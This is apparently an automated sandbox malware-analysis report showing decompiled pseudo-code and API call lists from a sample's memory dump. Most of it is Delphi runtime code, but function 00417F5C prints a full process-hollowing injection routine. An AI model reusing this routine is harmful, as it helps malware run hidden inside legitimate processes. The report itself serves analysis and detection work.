    0x00403d97
    0x00403d9a
    0x00403da1
    0x00403da1
    0x00403d9a
    0x00403d8a
    0x00403da6
    0x00403daf
    0x00403db1
    0x00403db1
    0x00403db8
    0x00403dba
    0x00403dba
    0x00403dc2
    0x00403dcb
    0x00403dcd
    0x00403dcd
    0x00403dd6
    0x00403dd6
    0x00403de7
    0x00403de7
    0x00403de9
    0x00403de9
    0x00403d3a
    0x00403d3a
    0x00403d40
    0x00403d44
    0x00403d46
    0x00000000
    0x00403d3a

    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    Function 00403D14, Relevance: 3.1, APIs: 2, Instructions: 66
    C-Code - Quality: 79%
    			E00403D14() {
				intOrPtr* _t13;
				struct HINSTANCE__* _t27;
				void* _t36;
				intOrPtr _t39;
				void* _t52;

				 *((intOrPtr*)(_t13 +  *_t13)) =  *((intOrPtr*)(_t13 +  *_t13)) + _t13 +  *_t13;
				if( *0x00454658 != 0 ||  *0x454040 == 0) {
					L5:
					if( *0x419004 != 0) {
						E00403C04();
						E00403C90(_t36);
						 *0x419004 = 0;
					}
					L7:
					if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
						 *0x0045463C = 0;
					}
					E00403AB8();
					if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
						_t17 =  *0x00454640;
						if( *0x00454640 != 0) {
							E0040532C(_t17);
							_t39 =  *((intOrPtr*)(0x454640));
							_t7 = _t39 + 0x10; // 0x400000
							_t27 =  *_t7;
							_t8 = _t39 + 4; // 0x400000
							if(_t27 !=  *_t8 && _t27 != 0) {
								FreeLibrary(_t27);
							}
						}
					}
					E00403A90();
					if( *((char*)(0x454658)) == 1) {
						 *0x00454654();
					}
					if( *((char*)(0x454658)) != 0) {
						E00403C60();
					}
					if( *0x454630 == 0) {
						if( *0x454024 != 0) {
							 *0x454024();
						}
						ExitProcess( *0x419000); // executed
					}
					memcpy(0x454630,  *0x454630, 0xb << 2);
					_t52 = _t52 + 0xc;
					0x419000 = 0x419000;
					goto L7;
				} else {
					do {
						 *0x454040 = 0;
						 *((intOrPtr*)( *0x454040))();
					} while ( *0x454040 != 0);
					goto L5;
				}
			}








    0x00403d16
    0x00403d33
    0x00403d4b
    0x00403d52
    0x00403d54
    0x00403d59
    0x00403d60
    0x00403d60
    0x00403d65
    0x00403d69
    0x00403d72
    0x00403d72
    0x00403d75
    0x00403d7e
    0x00403d85
    0x00403d8a
    0x00403d8c
    0x00403d91
    0x00403d94
    0x00403d94
    0x00403d97
    0x00403d9a
    0x00403da1
    0x00403da1
    0x00403d9a
    0x00403d8a
    0x00403da6
    0x00403daf
    0x00403db1
    0x00403db1
    0x00403db8
    0x00403dba
    0x00403dba
    0x00403dc2
    0x00403dcb
    0x00403dcd
    0x00403dcd
    0x00403dd6
    0x00403dd6
    0x00403de7
    0x00403de7
    0x00403de9
    0x00000000
    0x00403d3a
    0x00403d3a
    0x00403d40
    0x00403d44
    0x00403d46
    0x00000000
    0x00403d3a

    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    Function 00403D18, Relevance: 3.1, APIs: 2, Instructions: 64
    C-Code - Quality: 79%
    			E00403D18() {
				struct HINSTANCE__* _t26;
				void* _t35;
				intOrPtr _t38;
				void* _t51;

				if( *0x00454658 != 0 ||  *0x454040 == 0) {
					L4:
					if( *0x419004 != 0) {
						E00403C04();
						E00403C90(_t35);
						 *0x419004 = 0;
					}
					L6:
					if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
						 *0x0045463C = 0;
					}
					E00403AB8();
					if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
						_t16 =  *0x00454640;
						if( *0x00454640 != 0) {
							E0040532C(_t16);
							_t38 =  *((intOrPtr*)(0x454640));
							_t7 = _t38 + 0x10; // 0x400000
							_t26 =  *_t7;
							_t8 = _t38 + 4; // 0x400000
							if(_t26 !=  *_t8 && _t26 != 0) {
								FreeLibrary(_t26);
							}
						}
					}
					E00403A90();
					if( *((char*)(0x454658)) == 1) {
						 *0x00454654();
					}
					if( *((char*)(0x454658)) != 0) {
						E00403C60();
					}
					if( *0x454630 == 0) {
						if( *0x454024 != 0) {
							 *0x454024();
						}
						ExitProcess( *0x419000); // executed
					}
					memcpy(0x454630,  *0x454630, 0xb << 2);
					_t51 = _t51 + 0xc;
					0x419000 = 0x419000;
					goto L6;
				} else {
					do {
						 *0x454040 = 0;
						 *((intOrPtr*)( *0x454040))();
					} while ( *0x454040 != 0);
					goto L4;
				}
			}







    0x00403d33
    0x00403d4b
    0x00403d52
    0x00403d54
    0x00403d59
    0x00403d60
    0x00403d60
    0x00403d65
    0x00403d69
    0x00403d72
    0x00403d72
    0x00403d75
    0x00403d7e
    0x00403d85
    0x00403d8a
    0x00403d8c
    0x00403d91
    0x00403d94
    0x00403d94
    0x00403d97
    0x00403d9a
    0x00403da1
    0x00403da1
    0x00403d9a
    0x00403d8a
    0x00403da6
    0x00403daf
    0x00403db1
    0x00403db1
    0x00403db8
    0x00403dba
    0x00403dba
    0x00403dc2
    0x00403dcb
    0x00403dcd
    0x00403dcd
    0x00403dd6
    0x00403dd6
    0x00403de7
    0x00403de7
    0x00403de9
    0x00000000
    0x00403d3a
    0x00403d3a
    0x00403d40
    0x00403d44
    0x00403d46
    0x00000000
    0x00403d3a

    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    Function 00405824, Relevance: 1.5, APIs: 1, Instructions: 31
    C-Code - Quality: 100%
    			E00405824(intOrPtr* __eax, void* __edx) {
				char _v1032;
				int _t13;
				void* _t22;

				_t21 = __edx;
				if(__eax != 0) {
					if( *(__eax + 4) >= 0x10000) {
						return E00404080(__edx,  *(__eax + 4));
					}
					_t13 = LoadStringA(E00404DCC( *((intOrPtr*)( *__eax))),  *(__eax + 4),  &_v1032, 0x400); // executed
					return E00403F78(_t21, _t13, _t22);
				}
				return __eax;
			}






    0x0040582c
    0x00405832
    0x0040583b
    0x00000000
    0x0040586c
    0x00405855
    0x00000000
    0x00405860
    0x00405879

    APIs
    • LoadStringA.USER32(00000000,00010000,?,00000400), ref: 00405855
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    Function 00404D84, Relevance: 1.5, APIs: 1, Instructions: 26
    C-Code - Quality: 100%
    			E00404D84(void* __eax) {
				char _v272;
				intOrPtr _t14;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t19;

				_t16 = __eax;
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					GetModuleFileNameA( *(__eax + 4),  &_v272, 0x105);
					_t14 = E00404FC0(_t19); // executed
					_t18 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
					if(_t18 == 0) {
						 *((intOrPtr*)(_t16 + 0x10)) =  *((intOrPtr*)(_t16 + 4));
					}
				}
				return  *((intOrPtr*)(_t16 + 0x10));
			}








    0x00404d8c
    0x00404d92
    0x00404da2
    0x00404dab
    0x00404db0
    0x00404db2
    0x00404db7
    0x00404dbc
    0x00404dbc
    0x00404db7
    0x00404dca

    APIs
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00404DA2
      • Part of subcall function 00404FC0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,0000000B,00000000), ref: 00404FDC
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00404FFA
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00405018
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405036
      • Part of subcall function 00404FC0: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040507F
      • Part of subcall function 00404FC0: RegQueryValueExA.ADVAPI32(?,0040522C,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001), ref: 0040509D
      • Part of subcall function 00404FC0: RegCloseKey.ADVAPI32(?,004050CC,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004050BF
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
      • Part of subcall function 00404FC0: GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
      • Part of subcall function 00404FC0: GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
      • Part of subcall function 00404FC0: lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    Function 00403B18, Relevance: .0, Instructions: 37
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    Function 00402670, Relevance: .0, Instructions: 14
    C-Code - Quality: 37%
    			E00402670(void* __eax) {
				void* _t3;
				void* _t6;

				if(__eax <= 0) {
					_t6 = 0;
				} else {
					_t3 =  *0x41903c(); // executed
					_t6 = _t3;
					if(_t6 == 0) {
						E00402778(1);
					}
				}
				return _t6;
			}





    0x00402673
    0x0040268a
    0x00402675
    0x00402675
    0x0040267b
    0x0040267f
    0x00402683
    0x00402683
    0x0040267f
    0x0040268f

    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    Function 00403B78, Relevance: .0, Instructions: 12
    C-Code - Quality: 100%
    			E00403B78(intOrPtr __eax, intOrPtr __edx) {
				void* _t6;
				intOrPtr _t7;

				_t7 = __edx;
				 *0x454014 = 0x4011a8;
				 *0x454018 = 0x4011b0;
				 *0x454638 = __eax;
				 *0x45463c = 0;
				 *0x454640 = __edx;
				_t1 = _t7 + 4; // 0x400000
				 *0x45402c =  *_t1;
				E00403A70();
				 *0x454034 = 0; // executed
				_t6 = E00403B18(); // executed
				return _t6;
			}





    0x00403b78
    0x00403b78
    0x00403b82
    0x00403b8c
    0x00403b93
    0x00403b98
    0x00403b9e
    0x00403ba1
    0x00403ba6
    0x00403bab
    0x00403bb2
    0x00403bb7

    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd

    Non-executed Functions

    Function 00417F5C, Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 236
    C-Code - Quality: 76%
    			E00417F5C(intOrPtr __eax, void* __ebx, short* __ecx, char __edx, void* __edi, void* __esi, void* __fp0, intOrPtr* _a4) {
				intOrPtr _v8;
				char _v12;
				CONTEXT* _v16;
				void* _v20;
				void _v24;
				void _v28;
				long _v32;
				struct _PROCESS_INFORMATION _v48;
				struct _STARTUPINFOA _v116;
				CHAR* _t95;
				short* _t171;
				intOrPtr _t182;
				intOrPtr _t189;
				intOrPtr* _t194;
				short* _t196;
				void* _t197;
				void* _t199;
				void* _t200;
				intOrPtr _t201;
				void* _t215;

				_t215 = __fp0;
				_t199 = _t200;
				_t201 = _t200 + 0xffffff90;
				_t196 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E00404338(_v8);
				E00404338(_v12);
				_push(_t199);
				_push(0x418218);
				_push( *[fs:eax]);
				 *[fs:eax] = _t201;
				if(_v12 != 0) {
					_push(0x418230);
					_push(_v8);
					_push(0x41823c);
					_push(_v12);
					E00404208();
				}
				 *_a4 = 0;
				_t171 = _t196;
				if( *_t171 == 0x5a4d) {
					_t194 =  *((intOrPtr*)(_t171 + 0x3c)) + _t196;
					if( *_t194 == 0x4550) {
						E00402B60( &_v116, 0x44);
						E00402B60( &_v48, 0x10);
						_v116.cb = 0x44;
						_v116.dwFlags = 1;
						_v116.wShowWindow = 0;
						_t95 = E00404348(_v12);
						if(CreateProcessA(E00404348(_v8), _t95, 0, 0, 0, 4, 0, 0,  &_v116,  &_v48) != 0) {
							 *_a4 = _v48.dwProcessId;
							_v16 = E00417F28( &_v20);
							if(_v16 != 0) {
								_v16->ContextFlags = 0x10007;
								if(GetThreadContext(_v48.hThread, _v16) != 0) {
									ReadProcessMemory(_v48.hProcess, _v16->Ebx + 8,  &_v24, 4,  &_v32);
									if( *(_t194 + 0x34) != _v24) {
										_v28 = VirtualAllocEx(_v48.hProcess,  *(_t194 + 0x34),  *(_t194 + 0x50), 0x3000, 0x40);
									} else {
										if(NtUnmapViewOfSection(_v48.hProcess,  *(_t194 + 0x34)) != 0) {
											_v28 = VirtualAllocEx(_v48.hProcess, 0,  *(_t194 + 0x50), 0x3000, 0x40);
										} else {
											_v28 = VirtualAllocEx(_v48.hProcess,  *(_t194 + 0x34),  *(_t194 + 0x50), 0x3000, 0x40);
										}
									}
									_t210 = _v28;
									if(_v28 != 0) {
										_t197 = E00417EA4(_t196, _t210);
										_t125 = _v28;
										if( *(_t194 + 0x34) != _v28) {
											E00417E10(_t215, _t197, _t194, _t125 -  *(_t194 + 0x34));
											 *(_t194 + 0x34) = _v28;
											E00405DE0( *((intOrPtr*)(_t171 + 0x3c)) + _t197, _t194);
										}
										WriteProcessMemory(_v48.hProcess, _v28, _t197,  *(_t194 + 0x50),  &_v32);
										WriteProcessMemory(_v48.hProcess, _v16->Ebx + 8,  &_v28, 4,  &_v32);
										_v16->Eax =  *((intOrPtr*)(_t194 + 0x28)) + _v28;
										SetThreadContext(_v48.hThread, _v16);
										ResumeThread(_v48.hThread);
										WaitForSingleObject(_v48.hThread, 0xffffffff);
										_push(_t199);
										_push(0x4181d0);
										_push( *[fs:eax]);
										 *[fs:eax] = _t201;
										TerminateThread(_v48.hProcess, 0);
										CloseHandle(_v48.hProcess);
										_pop(_t189);
										 *[fs:eax] = _t189;
									}
								}
								VirtualFree(_v20, 0, 0x8000);
							}
							if( *_a4 == 0) {
								TerminateProcess(_v48, 0);
							}
						}
					}
				}
				_pop(_t182);
				 *[fs:eax] = _t182;
				_push(E0041821F);
				return E00403EAC( &_v12, 2);
			}























    0x00417f5c
    0x00417f5d
    0x00417f5f
    0x00417f65
    0x00417f67
    0x00417f6a
    0x00417f70
    0x00417f78
    0x00417f7f
    0x00417f80
    0x00417f85
    0x00417f88
    0x00417f8f
    0x00417f91
    0x00417f96
    0x00417f99
    0x00417f9e
    0x00417fa9
    0x00417fa9
    0x00417fb3
    0x00417fb5
    0x00417fbc
    0x00417fc5
    0x00417fcd
    0x00417fdd
    0x00417fec
    0x00417ff1
    0x00417ff8
    0x00417fff
    0x0041801c
    0x00418032
    0x0041803e
    0x00418048
    0x0041804f
    0x00418058
    0x0041806d
    0x0041808e
    0x00418099
    0x004180fc
    0x0041809b
    0x004180aa
    0x004180df
    0x004180ac
    0x004180c4
    0x004180c4
    0x004180aa
    0x004180ff
    0x00418103
    0x00418110
    0x00418115
    0x0041811a
    0x00418122
    0x0041812a
    0x00418139
    0x00418139
    0x0041814f
    0x0041816f
    0x0041817d
    0x0041818b
    0x00418194
    0x0041819f
    0x004181a6
    0x004181a7
    0x004181ac
    0x004181af
    0x004181b8
    0x004181c1
    0x004181c8
    0x004181cb
    0x004181cb
    0x00418103
    0x004181e5
    0x004181e5
    0x004181f0
    0x004181f8
    0x004181f8
    0x004181f0
    0x00418032
    0x00417fcd
    0x004181ff
    0x00418202
    0x00418205
    0x00418217

    APIs
    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F28: VirtualAlloc.KERNEL32(00000000,000000D0,00001000,00000004,?,00418048,00000000,00418218), ref: 00417F39
    • GetThreadContext.KERNEL32(?,00000000), ref: 00418066
    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
    • NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
    • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
    • WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
    • WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
    • SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
    • ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
    • TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
    • CloseHandle.KERNEL32(?), ref: 004181C1
    • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
    • TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    Function 00404E08, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 136
    C-Code - Quality: 53%
    			E00404E08(char* __eax, intOrPtr __edx) {
				char* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				struct _WIN32_FIND_DATAA _v334;
				char _v595;
				void* _t45;
				char* _t54;
				char* _t64;
				void* _t83;
				intOrPtr* _t84;
				char* _t90;
				struct HINSTANCE__* _t91;
				char* _t93;
				void* _t94;
				char* _t95;
				void* _t96;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = _v8;
				_t91 = GetModuleHandleA("kernel32.dll");
				if(_t91 == 0) {
					L4:
					if( *_v8 != 0x5c) {
						_t93 = _v8 + 2;
						goto L10;
					} else {
						if( *((char*)(_v8 + 1)) == 0x5c) {
							_t95 = E00404DF4(_v8 + 2);
							if( *_t95 != 0) {
								_t14 = _t95 + 1; // 0x1
								_t93 = E00404DF4(_t14);
								if( *_t93 != 0) {
									L10:
									_t83 = _t93 - _v8;
									_push(_t83 + 1);
									_push(_v8);
									_push( &_v595);
									L00401248();
									while( *_t93 != 0) {
										_t90 = E00404DF4(_t93 + 1);
										_t45 = _t90 - _t93;
										if(_t45 + _t83 + 1 <= 0x105) {
											_push(_t45 + 1);
											_push(_t93);
											_push( &(( &_v595)[_t83]));
											L00401248();
											_t94 = FindFirstFileA( &_v595,  &_v334);
											if(_t94 != 0xffffffff) {
												FindClose(_t94);
												_t54 =  &(_v334.cFileName);
												_push(_t54);
												L00401250();
												if(_t54 + _t83 + 1 + 1 <= 0x105) {
													 *((char*)(_t96 + _t83 - 0x24f)) = 0x5c;
													_push(0x105 - _t83 - 1);
													_push( &(_v334.cFileName));
													_push( &(( &(( &_v595)[_t83]))[1]));
													L00401248();
													_t64 =  &(_v334.cFileName);
													_push(_t64);
													L00401250();
													_t83 = _t83 + _t64 + 1;
													_t93 = _t90;
													continue;
												}
											}
										}
										goto L17;
									}
									_push(_v12);
									_push( &_v595);
									_push(_v8);
									L00401248();
								}
							}
						}
					}
				} else {
					_t84 = GetProcAddress(_t91, "GetLongPathNameA");
					if(_t84 == 0) {
						goto L4;
					} else {
						_push(0x105);
						_push( &_v595);
						_push(_v8);
						if( *_t84() == 0) {
							goto L4;
						} else {
							_push(_v12);
							_push( &_v595);
							_push(_v8);
							L00401248();
						}
					}
				}
				L17:
				return _v16;
			}



















    0x00404e14
    0x00404e17
    0x00404e1d
    0x00404e2a
    0x00404e2e
    0x00404e70
    0x00404e76
    0x00404eb3
    0x00000000
    0x00404e78
    0x00404e7f
    0x00404e90
    0x00404e95
    0x00404e9b
    0x00404ea3
    0x00404ea8
    0x00404eb6
    0x00404eb8
    0x00404ebe
    0x00404ec2
    0x00404ec9
    0x00404eca
    0x00404f75
    0x00404edc
    0x00404ee0
    0x00404eed
    0x00404ef4
    0x00404ef5
    0x00404efe
    0x00404eff
    0x00404f17
    0x00404f1c
    0x00404f1f
    0x00404f24
    0x00404f2a
    0x00404f2b
    0x00404f3b
    0x00404f3d
    0x00404f4d
    0x00404f54
    0x00404f5e
    0x00404f5f
    0x00404f64
    0x00404f6a
    0x00404f6b
    0x00404f71
    0x00404f73
    0x00000000
    0x00404f73
    0x00404f3b
    0x00404f1c
    0x00000000
    0x00404eed
    0x00404f81
    0x00404f88
    0x00404f8c
    0x00404f8d
    0x00404f8d
    0x00404ea8
    0x00404e95
    0x00404e7f
    0x00404e30
    0x00404e3b
    0x00404e3f
    0x00000000
    0x00404e41
    0x00404e41
    0x00404e4c
    0x00404e50
    0x00404e55
    0x00000000
    0x00404e57
    0x00404e5a
    0x00404e61
    0x00404e65
    0x00404e66
    0x00404e66
    0x00404e55
    0x00404e3f
    0x00404f92
    0x00404f9b

    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00404E25
    • GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00404E36
    • lstrcpyn.KERNEL32(?,?,?,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00404E66
    • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00404ECA
      • Part of subcall function 00404DF4: CharNextA.USER32(?), ref: 00404DF7
    • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001), ref: 00404EFF
    • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5), ref: 00404F12
    • FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000), ref: 00404F1F
    • lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068), ref: 00404F2B
    • lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B), ref: 00404F5F
    • lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8), ref: 00404F6B
    • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00404F8D
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
